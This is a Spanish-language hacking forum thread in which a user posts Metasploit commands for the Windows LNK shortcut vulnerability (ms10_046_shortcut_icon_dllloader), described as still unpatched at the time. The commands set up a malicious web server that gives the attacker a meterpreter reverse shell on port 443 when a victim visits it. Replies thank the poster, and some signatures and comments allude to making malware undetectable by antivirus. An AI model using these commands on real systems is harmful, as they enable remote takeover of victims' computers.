Mostrar mensajes previos
Ordenar por
por 4n0nym0us Usa camisa de fuerza
MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

Código: Seleccionar todo

Antiguo:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

Código: Seleccionar todo

Nuevo:
use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
por shiva-sheva Baneado ;(
Gracias 4n0nym0us ya consia este exploit para ejecutar archivos de echo en el taller de pentest les enseñare unos temas mas efectivos y mas complejos! espero verte pro ahi! saludos gracias por el aporte!
¡En el pen-testing el eslabon mas debil es el usuario!
por uxisar Se conecta desde un manicomio
muchisimas gracias amigo , he estado buscando esto mucho tiempo , gracias!!!
Imagen

<< Proceso de avs que detectan un server antes de pasar por indetectables y despues >>
Detect... >>Clean
Cuando me preguntaron sobre algún arma capaz de contrarrestar el poder de la bomba atómica yo sugerí la mejor de todas: La paz.
Albert Einstein
por 4n0nym0us Usa camisa de fuerza
Le cambiaron el nombre al Exploit, lo reedito y pongo el nombre actualizado
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
por LuisN2 Se conecta desde un manicomio
browser autopwn es mejor a mi parecer... lo que pasa esque nunca lo eché a andar, porque al enviar mi ip pública no va!
¡Atención! LuisN2.com ha caido, pero el blog sigue estando en www.luisn2indetectables.blogspot.com o www.LuisN2.cz.cc
por 4n0nym0us Usa camisa de fuerza
Sí el primer parche lo sacó G-Data... antes que Microsoft
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
por TRiGuNZ Delirios esporádicos

Código: Seleccionar todo

 Exploit exception: The address is already in use (95.16.136.43:80).
Que hay que hacer en este caso?
Imagen


Aprendiendo C/C++ 5%...


Arrasa con lo que veas, y generoso no seas.
Temas similares
Abusing LNK "Features" por xrahitel en Manuales y Tutoriales
Abusing LNK "Features" por xrahitel en Manuales y Tutoriales
METASPLOIT SESION MUERTA por Zac en Dudas y Preguntas
Links sobre el tema
Variantes de tema
Responder

Volver a “Exploits”